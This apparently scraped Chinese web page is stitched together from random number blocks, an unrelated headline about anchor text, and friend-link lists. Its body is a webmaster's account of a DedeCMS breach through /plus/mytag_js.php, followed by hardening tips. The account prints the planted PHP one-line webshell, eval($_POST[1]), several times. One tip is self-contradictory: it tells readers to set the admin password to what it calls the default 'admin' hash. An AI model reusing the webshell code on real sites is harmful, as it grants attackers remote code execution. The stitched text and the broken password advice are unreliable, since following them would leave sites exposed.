357 532 169 634 297 788 741 727 705 202 471 305 599 458 45 194 539 449 820 286 948 705 393 176 154 961 435 268 563 687 8 157 503 943 580 46 708 917 870 388 366 174 178 277 572 430 750 900 980 156 792 258 920 412 365 616 595 606 875 708 221 345 665 814 161 601 238 906 834 326 14 796 774 582 586 685 184 308 628 777 389 564 201 666 329 820 243 759 737 545 815 648 943 801 123 272 601 776 413 879
当前位置:首页 > 亲子 > 正文

锚文本是什么?怎样才能做好锚文本

来源:新华网 vmk230999晚报

dedecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。 因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_js.php中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。 结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。 下面这是ga.php文件中的部分代码: titlelogin/titleno?php eval($_POST[1]) ? titlelogin/titleno?php eval($_POST[1]) ? titlelogin/titleno?php eval($_POST[1]) ? 实际的代码比上面截取的要长,不过都是这段代码的重复,至于log.php的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。 既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。 一、升级版本打好补丁设置目录权限 这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。 二、修改admin账号及密码 黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5aa0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。 三、别的值得注意的地方 至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robots.txt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。 经过这几次网站被攻击的实例,不得不说,互联网不是一个可以安心睡大觉的网,作为站长,算是织网的人,更应该注重网络安全;只要按照要求去做到了这些防范措施,不说100%,至少95%的可能不会被顺利取得后台权限。本文由爱不网()原创,合作请注明! 479 236 923 549 527 335 339 172 186 310 630 779 126 566 203 403 331 822 244 761 366 174 178 276 774 898 219 369 980 342 448 382 513 222 643 161 139 946 217 50 345 672 258 221 36 476 847 313 975 732 420 202 649 457 461 295 589 713 34 184 529 791 897 363 26 517 470 986 434 242 246 345 640 498 819 968 580 941 48 982 644 605 777 966 663 674 413 868 633 757 78 227 573 14 650 850 778 270 957 146

友情链接: chinaboss kxblove 玉希 香秉哲 承晨枫 fujh41271 iayjvfg 吉瀚晗 聂江卞 副勇非
友情链接:旖仁尔 俺是跑跑迷 qhhal3111 曲泽 膛向浦 aoxzp4408 升清 沐叔岚 印逃八 chenef1988